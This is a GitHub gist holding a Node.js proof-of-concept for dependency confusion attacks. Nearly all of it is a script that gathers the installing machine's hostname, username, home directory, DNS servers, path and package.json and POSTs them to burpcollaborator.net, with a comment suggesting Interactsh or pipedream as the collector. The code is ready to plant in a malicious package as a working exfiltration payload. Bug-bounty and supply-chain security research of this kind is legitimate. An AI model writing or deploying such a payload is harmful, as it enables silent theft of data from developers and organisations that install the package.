Created
May 15, 2022 22:51
-
-
Save rodnt/e585fed79f3a37e4e7f4b9cb27c4f4ae to your computer and use it in GitHub Desktop.
PoC Dependecy confusion nodejs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const os = require("os"); | |
const dns = require("dns"); | |
const querystring = require("querystring"); | |
const https = require("https"); | |
const packageJSON = require("./package.json"); | |
const package = packageJSON.name; | |
const trackingData = JSON.stringify({ | |
p: package, | |
c: __dirname, | |
hd: os.homedir(), | |
hn: os.hostname(), | |
un: os.userInfo().username, | |
dns: dns.getServers(), | |
r: packageJSON ? packageJSON.___resolved : undefined, | |
v: packageJSON.version, | |
pjson: packageJSON, | |
}); | |
var postData = querystring.stringify({ | |
msg: trackingData, | |
}); | |
var options = { | |
hostname: "burpcollaborator.net", //replace burpcollaborator.net with Interactsh or pipedream | |
port: 443, | |
path: "/", | |
method: "POST", | |
headers: { | |
"Content-Type": "application/x-www-form-urlencoded", | |
"Content-Length": postData.length, | |
}, | |
}; | |
var req = https.request(options, (res) => { | |
res.on("data", (d) => { | |
process.stdout.write(d); | |
}); | |
}); | |
req.on("error", (e) => { | |
// console.error(e); | |
}); | |
req.write(postData); | |
req.end(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
https://dhiyaneshgeek.github.io/web/security/2021/09/04/dependency-confusion/